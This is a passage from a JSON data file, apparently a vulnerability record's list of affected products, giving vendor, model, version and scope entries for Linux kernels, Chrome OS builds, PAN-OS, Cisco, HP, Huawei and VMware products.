        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "linux cloudlinuxos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cloud",
        "version": "7"
      },
      {
        "model": "12900e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "kernel 3.19-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.27"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.170"
      },
      {
        "model": "pan-os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.2"
      },
      {
        "model": "6127xlg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "jabber guest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.65"
      },
      {
        "model": "vds recorder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vrealize operations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "cloudengine v200r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "visual quality experience server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "junos space 15.1f2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.32"
      },
      {
        "model": "pan-os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.8"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.2"
      },
      {
        "model": "kernel 4.4-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "model": "containers for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "virtuozzo",
        "version": "4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "16.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.42"
      },
      {
        "model": "ar3200 v200r006c15",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.31"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1164.1"
      },
      {
        "model": "helion cloudsystem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.121"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.88"
      },
      {
        "model": "kernel 4.1-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.48"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.3"
      },
      {
        "model": "cloudengine v100r006c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "8800"
      },
      {
        "model": "vrealize operations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59307)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.120"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63-2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.9"
      },
      {
        "model": "linux enterprise server sp2 ltss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.22"
      },
      {
        "model": "msr3000 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
      {
        "model": "msr2000 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.10"
      },
      {
        "model": "enterprise linux hpc node eus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.34"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.15"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.49"
      },
      {
        "model": "enterprise linux client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.11"
      },
      {
        "model": "junos space 15.1r2.11",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.342"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.6"
      },
      {
        "model": "scos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.48"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.57"
      },
      {
        "model": "kernel 4.1-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.48"
      },
      {
        "model": "linux",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1192.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.37"
      },
      {
        "model": "kernel 3.14-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1164.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.16"
      },
      {
        "model": "enterprise linux hpc node eus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.49"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.11"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.13"
      },
      {
        "model": "email gateway 7.6.2h968406",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.66"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.8"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.49"
      },
      {
        "model": "common services platform collector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vds-tv streamer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.31"
      },
      {
        "model": "5510hi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "6125xlg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.7"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.124"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.169"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.34"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.47"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.14"
      },
      {
        "model": "linux cloudlinuxos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cloud",
        "version": "6.0"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.405"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.54"
      },
      {
        "model": "cloudengine v100r005c10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.2"
      },
      {
        "model": "ar3200 v200r008c20spc700",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "linux enterprise server 11-extra",
        "scope": null,
        "trust": 0.3,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.11"
      },
      {
        "model": "kernel 3.19-rc",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux enterprise module for public cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.21"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.87"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.6"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.90"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.99"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.168"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.53"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.33"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.9"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "75007)0"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.3"
      },
      {
        "model": "propel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.20"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.41"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5.0.997"
      },
      {
        "model": "prime network change and configuration management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.71"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.16"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.128.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.67"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.26"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.65"
      },
      {
        "model": "ucs director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.70"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.12"
      },
      {
        "model": "junos space 15.2r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "105007)0"
      },
      {
        "model": "kernel 4.4-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.26"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.23"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.110"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.5"
      },
      {
        "model": "kernel 3.9-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.108"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.95"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.8"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.2"
      },
      {
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.19"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "129007)0"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.1"
      },
      {
        "model": "kernel 3.13-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.29"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.62"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.116"
      },
      {
        "model": "msr1000 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.17"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1192.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.67"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.62"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.115"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.2"
      },
      {
        "model": "videoscape distribution suite service manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2.8"
      },
      {
        "model": "helion cloudsystem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.1.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.14"
      },
      {
        "model": "dx series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.56"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.76"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.39"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.1"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel 3.9-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.2"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "79007)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
